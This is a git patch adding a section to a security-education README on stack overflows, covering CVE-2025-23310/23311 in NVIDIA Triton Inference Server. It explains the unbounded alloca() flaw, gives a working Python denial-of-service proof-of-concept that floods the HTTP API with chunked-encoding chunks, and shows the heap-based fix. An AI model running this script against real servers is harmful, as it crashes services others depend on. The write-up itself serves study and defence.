From 27be343664618771bc310819580bdd1905d2b45c Mon Sep 17 00:00:00 2001
From: HackTricks News Bot
Date: Tue, 5 Aug 2025 12:44:20 +0000
Subject: [PATCH] Add content from: Uncovering memory corruption in NVIDIA Triton (as a new hire...

---
 .../stack-overflow/README.md | 64 +++++++++++++++++++
 1 file changed, 64 insertions(+)

diff --git a/src/binary-exploitation/stack-overflow/README.md b/src/binary-exploitation/stack-overflow/README.md
index a154c51a0e4..90764e763e4 100644
--- a/src/binary-exploitation/stack-overflow/README.md
+++ b/src/binary-exploitation/stack-overflow/README.md
@@ -131,8 +131,72 @@ Even though stack canaries abort the process, an attacker still gains a **Denial
 * Always provide a **maximum field width** (e.g. `%511s`).
 * Prefer safer alternatives such as `snprintf`/`strncpy_s`.
 
+### Real-World Example: CVE-2025-23310 & CVE-2025-23311 (NVIDIA Triton Inference Server)
+
+NVIDIA’s Triton Inference Server (≤ v25.06) contained multiple **stack-based overflows** reachable through its HTTP API.
+The vulnerable pattern repeatedly appeared in `http_server.cc` and `sagemaker_server.cc`:
+
+```c
+int n = evbuffer_peek(req->buffer_in, -1, NULL, NULL, 0);
+if (n > 0) {
+    /* allocates 16 * n bytes on the stack */
+    struct evbuffer_iovec *v = (struct evbuffer_iovec *)
+        alloca(sizeof(struct evbuffer_iovec) * n);
+    ...
+}
+```
+
+1. `evbuffer_peek` (libevent) returns the **number of internal buffer segments** that compose the current HTTP request body.
+2. Each segment causes a **16-byte** `evbuffer_iovec` to be allocated on the **stack** via `alloca()` – **without any upper bound**.
+3. By abusing **HTTP _chunked transfer-encoding_**, a client can force the request to be split into **hundreds-of-thousands of 6-byte chunks** (`"1\r\nA\r\n"`). This makes `n` grow unbounded until the stack is exhausted.
+
+#### Proof-of-Concept (DoS)
+```python
+#!/usr/bin/env python3
+import socket, sys
+
+def exploit(host="localhost", port=8000, chunks=523_800):
+    s = socket.create_connection((host, int(port)))  # CLI args arrive as str
+    s.sendall((
+        "POST /v2/models/add_sub/infer HTTP/1.1\r\n"
+        f"Host: {host}:{port}\r\n"
+        "Content-Type: application/octet-stream\r\n"
+        "Inference-Header-Content-Length: 0\r\n"
+        "Transfer-Encoding: chunked\r\n"
+        "Connection: close\r\n\r\n"
+    ).encode())
+
+    for _ in range(int(chunks)):   # 6-byte chunk ➜ 16-byte alloc
+        s.sendall(b"1\r\nA\r\n")    # amplification factor ≈ 2.7x
+    s.sendall(b"0\r\n\r\n")        # end of chunks
+    s.close()
+
+if __name__ == "__main__":
+    exploit(*sys.argv[1:])
+```
+A ~3 MB request (523,800 chunks × 6 bytes) makes `alloca()` reserve roughly 8.4 MB of stack (523,800 × 16 bytes), which exhausts the stack and **crashes** the daemon on a default build.
+
+#### Patch & Mitigation
+The 25.07 release replaces the unsafe stack allocation with a **heap-backed `std::vector`** and gracefully handles `std::bad_alloc`:
+
+```c++
+std::vector<struct evbuffer_iovec> v_vec;
+try {
+    v_vec = std::vector<struct evbuffer_iovec>(n);
+} catch (const std::bad_alloc &e) {
+    return TRITONSERVER_ErrorNew(TRITONSERVER_ERROR_INVALID_ARG, "alloc failed");
+}
+struct evbuffer_iovec *v = v_vec.data();
+```
+
+Lessons learned:
+* Never call `alloca()` with attacker-controlled sizes.
+* Chunked requests can drastically change the shape of server-side buffers.
+* Validate / cap any value derived from client input *before* using it in memory allocations.
+
 ## References
 
 * [watchTowr Labs – Stack Overflows, Heap Overflows and Existential Dread (SonicWall SMA100)](https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/)
+* [Trail of Bits – Uncovering memory corruption in NVIDIA Triton](https://blog.trailofbits.com/2025/08/04/uncovering-memory-corruption-in-nvidia-triton-as-a-new-hire/)
 
 {{#include ../../banners/hacktricks-training.md}}